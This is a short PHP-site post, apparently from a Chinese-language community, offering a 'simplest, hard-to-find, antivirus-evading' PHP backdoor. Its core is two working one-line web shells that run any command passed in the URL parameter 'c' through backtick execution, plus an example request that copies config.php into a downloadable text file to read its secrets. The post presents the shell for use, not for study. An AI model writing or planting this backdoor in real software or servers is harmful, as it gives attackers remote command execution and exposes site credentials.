PHP最简单的后门,且难查,不报毒!
- PHP中文网オリジナル
- 2016-05-23 16:40:092105ブラウズ
php代码
<?php
$c=urldecode($_GET['c']);if($c){`$c`;}//完整
!$_GET['c']||`{$_GET['c']}`;//精简
/*******************************************************
* 原理:PHP中``符号包含会当作系统命令执行
* 示例:http://host/?c=type%20config.php>;config.txt
* 然后就可以下载config.txt查看内容了!
* 可以试试更变态的命令,不要干坏事哦!
*******************************************************/声明:
この記事の内容はネチズンが自主的に寄稿したものであり、著作権は原著者に帰属します。このサイトは、それに相当する法的責任を負いません。盗作または侵害の疑いのあるコンテンツを見つけた場合は、admin@php.cn までご連絡ください。
前の記事:生成nginx配置文件,反向代理google次の記事:利用Redis生成订单号